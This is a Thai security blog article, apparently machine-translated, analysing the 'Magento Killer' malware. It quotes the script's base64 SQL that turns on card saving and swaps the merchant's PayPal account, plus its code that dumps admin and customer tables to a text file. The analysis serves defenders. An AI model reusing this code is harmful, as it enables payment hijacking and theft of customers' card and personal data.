Computer >> คอมพิวเตอร์ >  >> ระบบเครือข่าย >> ความปลอดภัยของเครือข่าย

Magento Killer คืออะไรและทำงานอย่างไร

สคริปต์ที่เพิ่งค้นพบในชื่อ “Magento Killer ” ได้กำหนดเป้าหมายไปที่เว็บไซต์ Magento เมื่อเร็วๆ นี้ สคริปต์ $ConfKiller กำหนดเป้าหมายไฟล์ที่สำคัญที่สุดในเว็บไซต์เช่นไฟล์กำหนดค่า (ไฟล์กำหนดค่า) นอกจากนี้ $ConfKiller สคริปต์หากดำเนินการสำเร็จสามารถแก้ไขตาราง core_config_data ของฐานข้อมูล Magento ที่ถูกโจมตีได้

แม้ว่าจะไม่ได้ฆ่าการติดตั้งวีโอไอพีทั้งหมด แต่ก็เป็นอันตรายต่อเว็บไซต์ นักฆ่าวีโอไอพีเกี่ยวข้องกับการขโมยข้อมูลอย่างร้ายแรง ซึ่งข้อมูลดังกล่าวรวมถึงข้อมูลบัตรเครดิต ข้อมูลส่วนบุคคลที่สามารถระบุตัวตนได้ อีเมล ที่อยู่สำหรับการเรียกเก็บเงิน ฯลฯ

$ConfKiller:แนวทางปฏิบัติ

แฮกเกอร์ทำตามขั้นตอนต่างๆ เพื่อขโมยข้อมูลนี้ ฉันได้พยายามอธิบายวิธีการทำงานของสคริปต์ Magento killer ให้เรียบง่ายที่สุดเท่าที่จะทำได้ ได้ดังนี้:

ขั้นตอนที่ 1:แทนที่บัญชี PayPal ของผู้ค้า

ประการแรก ผู้โจมตีจะฉีดแบบสอบถาม SQL ที่เข้ารหัสเป็นพิเศษใน base64 แบบสอบถามที่ฉีดนี้มีลักษณะดังนี้:

$ConfKiller = array( 
 'Update DB (Savecc)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
 'Update PP (MailPP)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';

หากเราทำลายรหัสนี้ เราจะเห็นว่ามีการร้องขอสองรายการที่นี่:

  1. อัปเดตฐานข้อมูล (Savecc): คำขอนี้กำหนดค่าเว็บไซต์ Magento เพื่อ บันทึกข้อมูลบัตรเครดิตของลูกค้า บนเซิร์ฟเวอร์ แทนที่จะเป็นสถานการณ์ทั่วไปในการส่งไปยังแบ็กเอนด์ นั่นคือตัวประมวลผลการชำระเงิน (เช่น Authorize.net)
  2. อัปเดต PP (MailPP):ตอนนี้ t คำขอของเขาแทนที่บัญชี PayPal ของผู้ค้าในไซต์ Magento เป้าหมายเป็นบัญชีอื่นตามที่แฮ็กเกอร์ต้องการ

โดยปกติวีโอไอพีจะเข้ารหัสข้อมูลบัตรเครดิตที่บันทึกไว้ในเครื่อง แต่ในกรณีนี้ ไม่สามารถให้การป้องกันได้มากนักที่นี่

ดังนั้น ผู้โจมตีจึงสามารถขโมยคีย์การเข้ารหัสจากไฟล์ Magento ./app/etc/local.xml สำหรับตอนนี้พวกเขามีสิทธิ์เข้าถึงระบบไฟล์ของเว็บไซต์ ด้วยคีย์นี้ พวกเขาสามารถถอดรหัสข้อมูลบัตรเครดิตเป็นสิ่งที่เข้าใจได้มากขึ้น เช่น ข้อความธรรมดา

Magento Killer คืออะไรและทำงานอย่างไร

ขั้นตอนที่ 2:ขโมยข้อมูลลูกค้าที่เพิ่มเข้ามา

แม้ว่าแฮ็กเกอร์จะขโมยข้อมูลบัตรเครดิต แต่เขาก็ไม่สามารถใช้งานได้หากไม่มีข้อมูลเสริม ดังนั้น แฮ็กเกอร์จึงพยายามเก็บข้อมูลลูกค้าที่เพิ่มเข้ามา เช่น ชื่อ-นามสกุล อีเมล ที่อยู่สำหรับเรียกเก็บเงิน หมายเลขโทรศัพท์ ฯลฯ

เขาส่งรหัสบรรทัดต่อไปนี้เป็นแบบสอบถามซึ่งแสดงฐานข้อมูลไปยังแฮ็กเกอร์:

            $query = array(
'admin_user'                        => 'SELECT * FROM admin_user' ,
'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
'customer_entity'                   => 'SELECT * FROM customer_entity' ,

ขั้นตอนที่ 3:ดึงข้อมูลในไฟล์ข้อความ

ในที่สุด เขาถ่ายโอนข้อมูลสำคัญที่เลือกไปยังไฟล์ข้อความ ในกรณีนี้ *-shcMail.txt เป็นไฟล์ข้อความ ด้านล่างนี้คือรหัสที่รับรองความสำเร็จของการโจมตีโดย Magento Killer

$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
 while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
 $mail[] = $kolom_db[$shcolom[$shc_key]];
 $myfile = fopen($namefile, "a+") or die("Unable to open file!");
 fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."rn");
 fclose($myfile);

สคริปต์นี้สร้างลิงก์ไปยัง *-shcMail.txt ไฟล์. ในที่สุดก็แสดงผลเพื่อแจ้งผู้โจมตีว่าการเปลี่ยนแปลงการตั้งค่าสองครั้งแรกสำเร็จหรือไม่

บทสรุป

หากคุณสังเกตเห็นว่าเว็บไซต์ของคุณติดมัลแวร์นี้ด้วย ให้ทำตามคำแนะนำนี้เพื่อล้างมัลแวร์จากเว็บไซต์ Magento ของคุณ

หรือคุณสามารถข้ามความยุ่งยากในการอ่านโพสต์ยาวๆ อื่นได้เลย และใช้ประโยชน์จากการล้างมัลแวร์ทันทีที่นี่ . ในกรณีที่คุณยังไม่ติดไวรัสแต่ทำให้เว็บไซต์ของคุณปลอดภัยด้วยรายการตรวจสอบความปลอดภัยของ Magento .